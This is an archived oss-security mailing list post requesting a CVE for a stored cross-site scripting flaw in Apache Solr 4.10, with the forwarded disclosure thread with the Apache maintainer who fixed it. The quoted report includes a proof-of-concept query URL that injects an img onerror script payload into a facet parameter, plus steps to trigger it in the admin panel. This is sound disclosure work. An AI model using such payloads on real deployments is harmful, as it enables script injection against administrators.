Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Sun, 15 Mar 2015 14:30:44 +0530
From: Puneeth Gowda <puneethis021@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE Request - Apache Solr 4.10

Hi,

Please assign a CVE for this issue :
Software : Apache Solr
Version : 4.10

Thanks
Puneeth

FYI,



---------- Forwarded message ----------
From: Puneeth Gowda <puneethis021@...il.com>
Date: Tue, Nov 18, 2014 at 8:30 AM
Subject: Re: Security Vulnerability in Solr v4.10
To: Stefan Matheis <steffkes@...che.org>


Hello Stefan,

Patch is working fine..
Issue has been fixed now.

Thanks
Puneeth



On Fri, Nov 14, 2014 at 1:51 AM, Stefan Matheis <steffkes@...che.org> wrote:

>  Hi Puneeth
>
> I'm really sorry about the late reply - this is my first CVE i'm handling,
> so i'm trying to do it properly and wanted to ensure that everything is
> working according to plans & ASF agenda.
>
> The CVE you've asked about is CSV-2014-3628, the fix i was working on
> already is committed to trunk, you can have a look at the applied changes
> at https://issues.apache.org/jira/browse/SOLR-6738 . I'd be happy to know
> if that covers all the cases you've discovered or if there are more that
> i've missed with this fix!
>
> -Stefan
>
> On Sunday, November 2, 2014 at 8:38 AM, Puneeth Gowda wrote:
>
> Hi Stefan,
>
> Thank you for your response.
>
> I'd really appreciate if you could assign a CVE to this bug. !
>
> Thanks
> puneeth
>
> On Sun, Nov 2, 2014 at 4:52 AM, Stefan Matheis <steffkes@...che.org>
> wrote:
>
>  Hi Puneeth
>
> Sorry for the late response, thanks for reporting this vulnerability - i'm
> hereby acknowledging it on behalf of the Lucene PMC.
>
> We have investigated your report and accept it. I'm already working on a
> fix.
>
> -Stefan
>
> -------- Original Message --------
> Subject: Security Vulnerability in Solr v4.10
> Date: Wed, 29 Oct 2014 16:57:06 +0530
> From: Puneeth Gowda <puneethis021@...il.com>
> To: security@...che.org
>
>
>
> Hi,
>
> I would like to report a stored xss vulnerability in solr web app
> version : 4.10
>
> ###################################################
> Vulnerability Name : Stored XSS
> Software : Apache Solr
> Version : 4.10
> ###################################################
>
> POC:
>
>
> Steps:
> 1)Search with following query :
> fq=lang%3A1&fq=%3A1&facet=true&facet.field="}<img src=a
>
> onerror=alert(xss)>&facet.date=dateline&facet.date.start=2006-01-01T00%3A00%3A00.000Z%2FDAY&facet.date.end=2014-01-20T00%3A00%3A00.000Z%2FDAY%2B1DAY&facet.date.gap=%2B1DAY&facet.mincount=1&f.title.facet.limit=20&
> json.nl
> <http://json.nl
> >=map&sort=dateline%20desc&rows=1&facet_ranges=&q=*:*&wt=json
>
> Final URL :
> http://localhost:8080/solr/
> <app>/select?fq=lang%3A1&fq=%3A1&facet=true&facet.field="}<img
> src=a
>
> onerror=alert(xss)>&facet.date=dateline&facet.date.start=2006-01-01T00%3A00%3A00.000Z%2FDAY&facet.date.end=2014-01-20T00%3A00%3A00.000Z%2FDAY%2B1DAY&facet.date.gap=%2B1DAY&facet.mincount=1&f.title.facet.limit=20&
> json.nl
> <http://json.nl
> >=map&sort=dateline%20desc&rows=1&facet_ranges=&q=*:*&wt=json
>
> 2) Now browse to Solr Admin panel
> URL: http://localhost:8080/solr/
> Click on Plugins/stats after selecting <core> from the drop down.
> Browser displays popup.
>
> Reason : The parameter "fieldvalucache" stores all searched queries
> without sanitizing, which results in execution of javascript.
>
>
> Thanks
> Puneeth
>
>
>
>
>

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.